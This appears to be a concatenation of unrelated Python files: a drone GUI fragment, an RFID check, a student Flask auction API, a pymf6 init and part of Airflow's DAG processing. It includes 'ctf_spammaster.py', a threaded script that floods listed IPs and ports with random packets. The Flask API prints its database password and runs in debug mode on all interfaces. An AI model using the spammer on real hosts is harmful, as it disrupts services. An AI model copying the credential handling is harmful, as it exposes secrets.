def telloFlip_l(self):
return self.tello.flip('l')
def telloFlip_r(self):
return self.tello.flip('r')
def telloFlip_f(self):
return self.tello.flip('f')
def telloFlip_b(self):
return self.tello.flip('b')
def telloCW(self, degree):
return self.tello.rotate_cw(degree)
def telloCCW(self, degree):
return self.tello.rotate_ccw(degree)
def telloMoveForward(self, distance):
return self.tello.move_forward(distance)
def telloMoveBackward(self, distance):
return self.tello.move_backward(distance)
def telloMoveLeft(self, distance):
return self.tello.move_left(distance)
def telloMoveRight(self, distance):
return self.tello.move_right(distance)
def telloUp(self, dist):
return self.tello.move_up(dist)
def telloDown(self, dist):
return self.tello.move_down(dist)
def updateTrackBar(self):
self.my_tello_hand.setThr(self.hand_thr_bar.get())
def updateDistancebar(self):
self.distance = self.distance_bar.get()
print 'reset distance to %.1f' % self.distance
def updateDegreebar(self):
self.degree = self.degree_bar.get()
print 'reset distance to %d' % self.degree
def on_keypress_w(self, event):
print "up %d m" % self.distance
self.telloUp(self.distance)
def on_keypress_s(self, event):
print "down %d m" % self.distance
self.telloDown(self.distance)
def on_keypress_a(self, event):
print "ccw %d degree" % self.degree
self.tello.rotate_ccw(self.degree)
def on_keypress_d(self, event):
print "cw %d m" % self.degree
self.tello.rotate_cw(self.degree)
def on_keypress_up(self, event):
print "forward %d m" % self.distance
self.telloMoveForward(self.distance)
def on_keypress_down(self, event):
print "backward %d m" % self.distance
self.telloMoveBackward(self.distance)
def on_keypress_left(self, event):
print "left %d m" % self.distance
self.telloMoveLeft(self.distance)
def on_keypress_right(self, event):
print "right %d m" % self.distance
self.telloMoveRight(self.distance)
def on_keypress_enter(self, event):
if self.frame is not None:
self.registerFace()
self.tmp_f.focus_set()
def onClose(self):
"""
set the stop event, cleanup the camera, and allow the rest of
the quit process to continue
"""
print("[INFO] closing...")
self.stopEvent.set()
del self.tello
self.root.quit()
|
ctf_spammaster.py | """
Released under the MIT-license:
Copyright (c) 2009,2010 Earl Marcus
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import socket
import time
import random
import thread
from threading import Thread
from Queue import Queue
time_min = 1
def_IPList = []
#Used for threading
ip_queue = Queue()
printLock = None
#Generate random packet w/ size (anywhere between 30-1024)
def GeneratePacket():
size = random.randint(30,256)
packet = ""
for i in xrange(size):
packet += chr(random.randint(0,255))
return (packet,size)
def SpamThread(ip):
global ports
for port in ports:
packet, size = GeneratePacket()
#Spam
printStr("Spamming %s:%s with data size %d" % (ip, port, size))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(packet)
s.close()
except:
printStr("Failed on %s port %s" % (ip, port))
def printStr(string):
global printLock
printLock.acquire()
print string
printLock.release()
def workerThread(q):
ip = q.get()
while 1:
SpamThread(ip)
#time.sleep(time_min*60)
time.sleep(30)
q.task_done()
if __name__ == "__main__":
random.seed()
#Load IP's
f = open("ips.txt")
ips = f.read().split()
f.close()
#Load Ports
f = open("ports.txt")
ports = f.read().split()
f.close()
#Acquire locks
printLock = thread.allocate_lock()
#Start kicking off threads
for i in xrange(10):
worker = Thread(target=workerThread, args=(ip_queue,))
worker.setDaemon(True)
worker.start()
for ip in ips:
ip_queue.put(ip)
ip_queue.join()
|
rfid_auth.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import RPi.GPIO as GPIO
import MFRC522
import signal
import time
import threading
from multiprocessing import Process
# Capture SIGINT for cleanup when the script is aborted
def end_read(signal,frame):
global continue_reading
print "Ctrl+C captured, ending read."
continue_reading = False
GPIO.cleanup()
continue_reading = True
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11,GPIO.OUT)
GPIO.setup(13,GPIO.OUT)
GPIO.setup(15,GPIO.OUT)
# LED Pulsate function
def pulsate():
red = GPIO.PWM(11, 100)
red.start(0)
pause_time = 0.011
try:
while True:
print "running"
for i in range(100, -1, -1):
red.ChangeDutyCycle(100 - i)
time.sleep(pause_time)
for i in range(0, 101):
red.ChangeDutyCycle(100 - i)
time.sleep(pause_time)
except Exception as e:
print str(e)
# Create object for pulsate_led process
def startPulsate():
pulsate_led = Process(target=pulsate)
pulsate_led.daemon = True
pulsate_led.start()
return pulsate_led
# Call pulsate process into a variable
p = startPulsate()
# Hook the SIGINT
signal.signal(signal.SIGINT, end_read)
# Create an object of the class MFRC522
MIFAREReader = MFRC522.MFRC522()
# This loop keeps checking for chips. If one is near it will get the UID and authenticate
while continue_reading:
# Scan for cards
(status,TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)
# Get the UID of the card
(status,uid) = MIFAREReader.MFRC522_Anticoll()
# If we have the UID, continue
if status == MIFAREReader.MI_OK:
# Join UID array into friendly string
uid_str = ":".join([str(x) for x in uid])
# Define authorized card
authorized_uid = "201:133:20:43:115"
# Kill pulsating LED process
p.terminate()
# Check if UID is Authorized
if uid_str == authorized_uid:
# Green Light
GPIO.output(13, GPIO.HIGH)
else:
# Red Light - DENIED
GPIO.output(15, GPIO.HIGH)
print("DENIED!")
# Wait 5 seconds then turn all the lights off
time.sleep(5)
GPIO.output(13, GPIO.LOW)
GPIO.output(15, GPIO.LOW)
# Restart pulsating process
p = startPulsate()
|
demo-api.py | ##
## =============================================
## ============== Bases de Dados ===============
## ============== LEI 2020/2021 ===============
## =============================================
## =================== Demo ====================
## =============================================
## =============================================
## === Department of Informatics Engineering ===
## =========== University of Coimbra ===========
## =============================================
##
## Authors:
## Nuno Antunes <nmsa@dei.uc.pt>
## BD 2021 Team - https://dei.uc.pt/lei/
## University of Coimbra
from flask import Flask, jsonify, request
import logging, psycopg2, time
import hashlib
import threading,time
from encrypter import dec_file
usr=""
pswd=""
hst=""
dbase=""
app = Flask(__name__)
def return_user_id(token, cur):
statement = """
SELECT confirm_token(%s)"""
try:
cur.execute(statement, (token,))
res= cur.fetchone()
res=res[0]
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
res=-1
if res is None:
return -1
return res
# !not used rn
def formatter_db_update(dic, id ):
return 'update leiloes set ('+(len(dic)-1)*'%s,'+'%s) values ('+'('+(len(dic)-1)*'%s,'+'%s) where leilaoid='+id+';' # dic.keys()+ dic.values())
def warn_winning_bidders(): # fazer uma thread com esta funcao
# ver quais os leilões que acabaram
conn = db_connection()
cur = conn.cursor()
while True:
try:
print("checking auctions")
cur.execute('call clean_tokens();')
cur.execute('call warn_auct_winners();')
cur.execute('commit')
time.sleep(5*60) #sleeps 5 minutes before each action
except (Exception, psycopg2.DatabaseError) as error:
logger.error('In supporting thread...')
logger.error(error)
cur.execute('rollback')
# avisar os respetivos utilizadores
#very basic email regex checking: [a-zA-Z0-9\.\_]+@[a-zA-Z0-9\.\_]+\.[a-zA-Z0-9\.\_]+
# user login
@app.route("/dbproj/user/", methods=['POST']) # insercao de artigo
def add_user():
logger.info("### INSERTION OF USERS ###");
payload = request.get_json()
if "username" not in payload or "password" not in payload or "email" not in payload :
return 'username , email and password are required to create a new username!'
conn = db_connection()
cur = conn.cursor()
logger.info("---- new user ----")
logger.debug(f'payload: {payload}')
# parameterized queries, good for security and performance
statement = """
SELECT register_user(%s, %s, %s);"""
val_pass = hashlib.sha256(payload["password"].encode()).hexdigest()
#logger.info(payload["username"])
logger.info(val_pass) # ? is this what you mean?
values = (payload["username"], val_pass, payload["email"])
try:
cur.execute(statement, values)
cur.execute('commit')
result = 'User registered!'
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
# user login
@app.route("/dbproj/message/<leilaoid>", methods=['POST']) # insercao de artigo
def send_message(leilaoid):
logger.info("### INSERTION OF USERS ###");
payload = request.get_json()
if "message" not in payload or "authToken" not in payload:
return 'message and authToken are required to send message!'
conn = db_connection()
cur = conn.cursor()
userId = return_user_id(payload["authToken"], cur)
if userId == -1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
logger.info("---- new user ----")
logger.debug(f'payload: {payload}')
# parameterized queries, good for security and performance
statement = """
INSERT INTO mensagem values ((select coalesce(max(msg_id),0)+1 from mensagem), %s, now(), %s, %s);
"""
values = (payload["message"], userId, leilaoid)
try:
cur.execute(statement, values)
cur.execute('commit')
result = 'Message delivered!'
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
# user login
@app.route("/dbproj/notif/<all>", methods=['GET']) # insercao de artigo
def open_notif_box(all):
logger.info("### NOTIFICATION CHECK ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is required to check notif box!'
conn = db_connection()
cur = conn.cursor()
userId = return_user_id(payload["authToken"], cur)
if userId == -1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
logger.info("---- checking notifs ----")
logger.debug(f'payload: {payload}')
# parameterized queries, good for security and performance
if all:
statement1 = """
select assunto, conteudo, data from notificacao where id_notif in
(select notificacao_id_notif from utilizador_notificacao
where utilizador_userid = %s)
order by id_notif desc;
"""
else:
statement1 = """
select assunto, conteudo, data from notificacao where id_notif in
(select notificacao_id_notif from utilizador_notificacao
where utilizador_userid = %s and lida = false)
order by id_notif desc;
"""
statement2 = """
update utilizador_notificacao set lida = true where
utilizador_userid =%s
"""
values = ( userId,)
result =[]
try:
cur.execute(statement1, values)
rows = cur.fetchall()
if rows == []:
result= 'No new notifications'
else:
for row in rows:
print(row)
result.append({'assunto': row[0], 'data': row[2], 'conteudo': row[1]})
cur.execute(statement2, values)
cur.execute('commit')
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
@app.route("/dbproj/user/", methods=['PUT'])
def authenticate_user():
logger.info("### AUTHENTICATION OF USERS ###");
content = request.get_json()
if "userId" not in content or "password" not in content:
return 'user and password are required to login!'
conn = db_connection()
cur = conn.cursor()
logger.info("---- update user ----")
logger.info(f'content: {content}')
# parameterized queries, good for security and performance
statement ="""
SELECT authenticate(%s, %s, interval '03:00:00')
"""
val_pass = hashlib.sha256(content["password"].encode()).hexdigest()
values = (content["userId"], val_pass)
logger.info(f'SELECT authenticate({values[0]}, {values[1]})')
try:
cur.execute(statement, values)
res=cur.fetchone()
logger.info(f'{res}')
result={"authToken": res[0]}
cur.execute('commit')
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
@app.route('/')
def hello():
return """
Benvindo ao gestor de leilões! <br/>
<br/>
Efetue o seu login ou registe-se para continuar!<br/>
<br/>
AP Team<br/>
<br/>
"""
##
## Demo GET
##
## Obtain all departments, in JSON format
##
## To use it, access:
##
## http://localhost:8080/departments/
##
## GET http://localhost:8080/dbproj/leiloes
'''
def terminate_auctions():
while True:
return 1
'''
@app.route("/dbproj/leiloes", methods=['GET'], strict_slashes=True)
def get_all_auctions():
logger.info("### DEMO: GET /leiloes ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is required to list all auctions!'
conn = db_connection()
cur = conn.cursor()
if return_user_id(payload["authToken"], cur) == -1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
cur.execute("SELECT leilaoid, descricao FROM leilao where leilaoid = versao_atual")
rows = cur.fetchall()
payload = []
logger.debug("---- leiloes ----")
for row in rows:
logger.debug(row)
content = {'leilaoId': int(row[0]), 'descricao': row[1]}
payload.append(content) # appending to the payload to be returned
conn.close()
return jsonify(payload)
@app.route("/dbproj/leiloes/<keyword>", methods=['GET'], strict_slashes=True)
def get_auction_by_keyword(keyword): #check
logger.info("### DEMO: GET /leiloes ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is required to list auctions with that keyword!'
conn = db_connection()
cur = conn.cursor()
if return_user_id(payload["authToken"], cur) == -1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
keyword1='%'+ keyword + '%'
statement1= """
select leilaoid, descricao from leilao
where leilaoid in
(SELECT distinct versao_atual FROM leilao
WHERE (artigo_artigoid = %s
or descricao like %s ) )
"""
statement2= """
select leilaoid, descricao from leilao
where leilaoid in
(SELECT distinct versao_atual FROM leilao
WHERE descricao like %s )
"""
try:
art_id= int(keyword)
cur.execute(statement1, (str(art_id), keyword1))
except ValueError:
cur.execute(statement2, (keyword1,))
rows = cur.fetchall()
payload = []
logger.debug("---- leiloes ----")
for row in rows:
logger.debug(row)
content = {'leilaoId': int(row[0]), 'descricao': row[1]}
payload.append(content) # appending to the payload to be returned
if payload==[]:
payload= 'No auction matches your search!'
conn.close()
return jsonify(payload)
@app.route("/dbproj/leilao/", methods=['POST']) # insercao de artigo
def add_auction():
logger.info("### DEMO: POST /leilao ###");
payload = request.get_json()
if "authToken" not in payload or "artigoId" not in payload or "precoMinimo" not in payload or "titulo" not in payload or "descricao" not in payload or "expira_leilao" not in payload or "nome" not in payload:
return 'authToken, artigoId, precoMinimo, titulo, descricao, expira_leilao and nome are required to add an auction!'
conn = db_connection()
cur = conn.cursor()
logger.info("---- new leilao ----")
logger.debug(f'payload: {payload}')
user_id= return_user_id(payload["authToken"], cur)
if user_id==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
# parameterized queries, good for security and performance
statement = """SELECT insert_auction(%s, %s, %s,%s, %s, %s, %s)"""
values = (user_id, payload["artigoId"], payload["precoMinimo"], payload["titulo"], payload["descricao"], payload["expira_leilao"], payload["nome"])
try:
cur.execute(statement, values)
l_id=cur.fetchone()
if l_id[0]==-1:
result= 'Name does not correspond to its id'
cur.execute('rollback')
return result
elif l_id[0] ==-2:
result= 'expire date is in the past...'
cur.execute('rollback')
return result
else:
result= {"leilaoId": int (l_id[0])}
cur.execute('commit')
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
@app.route("/dbproj/leilao/<leilaoId>", methods=['PUT']) # insercao de artigo
def update_auction(leilaoId):
logger.info("### DEMO: PUT /leilao/id ###");
payload = request.get_json()
if "authToken" not in payload or ("titulo" not in payload and "descricao" not in payload):
return 'authToken, titulo and/or descricao are required to update an auction!'
conn = db_connection()
cur = conn.cursor()
logger.info("---- update leilao ----")
logger.debug(f'payload: {payload}')
user_id= return_user_id(payload["authToken"], cur)
if user_id==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
# parameterized queries, good for security and performance
statement = """SELECT create_copy_to_update(%s, %s)"""
values = (leilaoId, user_id)
try:
cur.execute(statement, values)
l_row= cur.fetchone()
logger.info(str(l_row))
if l_row[0] == -1:
result = 'Error: Can\'t edit an old version of an auction'
elif l_row[0]==-2:
result = 'Error: Can\'t edit an auction you didn\'t open'
elif l_row[0]==-3:
result = 'The auction you are trying to edit does not exist!'
else:
statement2 = """
select * from leilao where leilaoid = %s
"""
value2 = (l_row[0],)
cur.execute(statement2, value2)
row_to_update= cur.fetchone()
descricao = row_to_update[2]
if "descricao" in payload:
# cur.execute("update leilao set descricao = %s where leilaoid = %s", (payload["descricao"],l_id[0]))
descricao = payload["descricao"]
titulo = row_to_update[1]
if "titulo" in payload:
# cur.execute("update leilao set titulo = %s where leilaoid = %s", (payload["titulo"],l_id[0]))
titulo = payload["titulo"]
cur.execute("update leilao set titulo = %s, descricao= %s where leilaoid = %s", (titulo, descricao, row_to_update[0]))
logger.info("after update")
cur.execute('commit')
#cur.execute("select leilaoid, titulo, descricao, artigo_artigoid, expira_leilao from leilao where leilaoid= %s",(l_row[0],))
#res=cur.fetchone()
result={'leilaoId': int(row_to_update[0]),'titulo' : titulo, 'descricao': descricao, 'artigoid': row_to_update[3], 'expire_date': row_to_update[4] }
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
@app.route("/dbproj/leilao/<leilaoId>", methods=['GET']) # consulta completa de leilao
def details_auction(leilaoId):
logger.info("### DEMO: GET /leilao/id ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is required to consult auction\'s details!'
conn = db_connection()
cur = conn.cursor()
authToken = payload["authToken"]
logger.debug(f'authToken: {authToken}')
user_id= return_user_id(authToken, cur)
if user_id==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
# parameterized queries, good for security and performance
statement1 = """
SELECT titulo, descricao, precoatual, expira_leilao , utilizador_userid
from leilao ll where
ll.leilaoId = %s and ll.leilaoId = ll.versao_atual
"""
statement2 = """
select * from artigo where artigoid = (select artigo_artigoid from leilao where leilaoId = %s);
"""
statement3 = """
select m.conteudo, m.data, u.username
from mensagem m, utilizador u
where leilao_leilaoid = %s
and u.userid = m.utilizador_userid;
"""
statement4 = """
select l.licitaid, l.valor, l.licita_hora, u.username
from licita l , utilizador u
where leilao_leilaoid = %s
and u.userid = l.utilizador_userid;
"""
values = (leilaoId,)
try:
payload = []
cur.execute(statement1, values)
row=cur.fetchone()
if row != []:
payload.append("General info on auction %s:" % leilaoId)
content = [{'titulo': row[0], 'descricao': row[1], 'precoatual':row[2], 'expira_leilao':row[3]}]
owner_id = row[4]
cur.execute ("select nome from utilizador where userid = %s", (owner_id, ))
owner_username = cur.fetchone()
content["organizador"]= owner_username[0]
payload.append(content) # appending to the payload to be returned
payload.append("Item info")
cur.execute(statement2, values)
row=cur.fetchone()
content = [{'artigoId':row[0], 'nome':row[1]}]
# content = [row]
payload.append(content)
payload.append("Mensagens:")
cur.execute(statement3, values)
content = []
rows= cur.fetchall()
for row in rows:
content.append({'conteudo': row[0],'data': row[1], 'username':row[2]})
payload.append(content)
payload.append("Licitacoes:")
cur.execute(statement4, values)
content = []
rows= cur.fetchall()
for row in rows:
content.append({'licitaid': row[0],'valor': row[1], 'licita_hora': row[2], 'username':row[3]})
payload.append(content)
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
payload = 'Error obtaining the info you asked for :(!'
finally:
if conn is not None:
conn.close()
return jsonify(payload)
@app.route("/dbproj/leilao/<leilaoId>/<licitacao>", methods=['PUT']) # insercao de artigo
def bid_leilao(leilaoId, licitacao):
logger.info("### DEMO: PUT /leilao/id ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is needed to make a bid'
conn = db_connection()
cur = conn.cursor()
logger.debug(f'leilaoId: {leilaoId}; licitacao: {licitacao}')
user_id= return_user_id(payload["authToken"], cur)
if user_id==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
value_licita = float(licitacao)
# parameterized queries, good for security and performance
statement = """
begin transaction isolation level serializable;
SELECT licitacao(%s, %s, %s)
"""
values = (user_id, leilaoId, licitacao)
try:
cur.execute(statement, values)
res=cur.fetchone()
res= res[0]
logger.info(f'{res}')
if res== -1:
result = 'You need to bid higher than the last bid'
cur.execute('rollback')
elif res==-2:
result = 'This auction has already ended!'
cur.execute('rollback')
elif res== -3:
result = 'You cannot bid in your own auction!'
cur.execute('rollback')
else:
cur.execute('commit')
result = 'Your bid has been registered!'
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
result = 'Error while processing your bid!'
cur.execute('rollback')
finally:
if conn is not None:
conn.close()
return jsonify(result)
@app.route("/dbproj/lookup/", methods=['GET']) # insercao de artigo
def related_auctions():
logger.info("### DEMO: PUT /leilao/id ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is needed to list related auctions'
authToken= payload["authToken"]
conn = db_connection()
cur = conn.cursor()
logger.debug(f'authToken: {authToken}')
authToken = payload["authToken"]
user_id= return_user_id(authToken, cur)
if user_id==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
# parameterized queries, good for security and performance
statement = """
SELECT leilaoid, titulo, descricao, precoatual, expira_leilao
from leilao ll where
ll.utilizador_userid = %s and ll.leilaoid = ll.versao_atual
or exists (select licita_utilizador_utilizadorid
from notificacao_licita_licita n
where n.utilizador_userid = %s and n.licita_licitaid =ll.leilaoid )
"""
values = (user_id, user_id)
try:
payload = []
cur.execute(statement, values)
rows=cur.fetchall()
for row in rows:
logger.debug(row)
content = {'leilaoId': row[0],'titulo': row[1], 'descricao': row[2], 'precoatual':row[3], 'data_expira':row[4]}
payload.append(content) # appending to the payload to be returned
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
payload = 'Error obtaining the info you asked for :(!'
finally:
if conn is not None:
conn.close()
return jsonify(payload)
## Demo GET
##
## Obtain department with ndep <ndep>
##
## To use it, access:
##
## http://localhost:8080/departments/10
##
@app.route("/dbproj/artigo/<artigoId>", methods=['GET'])
def get_item(artigoId):
logger.info("### DEMO: GET /artigos/<artigoId> ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is needed to consult an item'
conn = db_connection()
cur = conn.cursor()
authToken = payload["authToken"]
if return_user_id(authToken, cur)==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
logger.debug(f'artigoId: {artigoId}')
cur.execute("SELECT artigoId, nome FROM artigo where artigoid = %s", (artigoId,) )
rows = cur.fetchall()
if rows is None:
return 'No matches for your search!'
row = rows[0]
logger.debug("---- selected item ----")
logger.debug(row)
content = {'artigoId': int(row[0]), 'nome': row[1] }
conn.close ()
return jsonify(content)
##
## Demo POST
##
## Add a new department in a JSON payload
##
## To use it, you need to use postman or curl:
##
## curl -X POST http://localhost:8080/departments/ -H "Content-Type: application/json" -d '{"localidade": "Polo II", "ndep": 69, "nome": "Seguranca"}'
##
@app.route("/dbproj/artigo/", methods=['POST']) # insercao de artigo
def insert_item():
logger.info("### DEMO: POST /artigo ###");
payload = request.get_json()
if "authToken" not in payload:
return 'authToken is needed to add an item'
conn = db_connection()
cur = conn.cursor()
authToken = payload["authToken"]
if return_user_id(authToken, cur)==-1:
if conn is not None:
conn.close()
return 'Invalid token: check it or login again'
logger.info("---- new artigo ----")
logger.debug(f'payload: {payload}')
# parameterized queries, good for security and performance
statement = """
INSERT INTO artigo (artigoId, nome)
VALUES ( %s, %s )"""
values = (payload["artigoId"], payload["nome"])
try:
cur.execute(statement, values)
cur.execute('commit')
result = 'Inserted!'
except (Exception, psycopg2.DatabaseError) as error:
logger.error(error)
cur.execute('rollback')
result = 'Failed!'
finally:
if conn is not None:
conn.close()
return jsonify(result)
##########################################################
## DATABASE ACCESS
##########################################################
def db_connection():
db = psycopg2.connect(user = usr,
password = pswd,
host = hst,
port = "5432",
database = dbase)
db.set_session(autocommit=False)
return db
##########################################################
## MAIN
##########################################################
if __name__ == "__main__":
ret = dec_file('.creds_crypto')
print(ret)
ar = ret.split(',')
print('User: %s' % ar[0])
usr= ar[0]
print('Password: %s' % ar[1])
pswd= ar[1]
print('Host: %s' % ar[2])
hst= ar[2]
print('Database: %s' % ar[3])
dbase= ar[3]
x = threading.Thread(target=warn_winning_bidders, args=())
x.start()
print('Boo1')
# Set up the logging
logging.basicConfig(filename="logs/log_file.log")
print('Boo2')
logger = logging.getLogger('logger')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
print('Boo3')
# create formatt
formatter = logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s',
'%H:%M:%S')
# "%Y-%m-%d %H:%M:%S") # not using DATE to simplify
ch.setFormatter(formatter)
logger.addHandler(ch)
print('Boo4')
time.sleep(1) # just to let the DB start before this print :-)
logger.info("\n---------------------------------------------------------------\n" +
"API v1.0 online: http://localhost:8080/departments/\n\n")
app.run(host="0.0.0.0", debug=True, threaded=True)
|
__init__.py | """
Python Wrapper for MODFLOW 6
"""
from multiprocessing import Process
from . mf6 import mf6_sub # pylint: disable-msg=no-name-in-module
__all__ = ['__version__', '__name__', '__author__']
__version__ = '0.5.0'
__name__ = 'pymf6' # pylint: disable=redefined-builtin
__author__ = 'Mike Müller'
MFSIM_NAM = 'mfsim.nam'
BACKUP_DIR = '__pymf6__backup'
DATA_MAPPING = 'data_mapping.pkl'
def func(callback, kwargs):
"""Helper function for run with `multiprocessing`
"""
from pymf6.callback import Func
class MyFunc(callback, Func):
pass
if kwargs is None:
kwargs = {}
mf6_sub(MyFunc(**kwargs))
def run(callback, kwargs):
"""Run the MF6 model in the current paths with `callback`
"""
process = Process(target=func, args=(callback, kwargs))
process.start()
process.join()
|
dag_processing.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
import enum
from typing import NamedTuple, Iterable
import psutil
from setproctitle import setproctitle
import six
from six.moves import reload_module
from sqlalchemy import or_
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.settings import Stats
from airflow.models import errors
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
if six.PY2:
ConnectionError = IOError
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id=None):
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance(object):
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
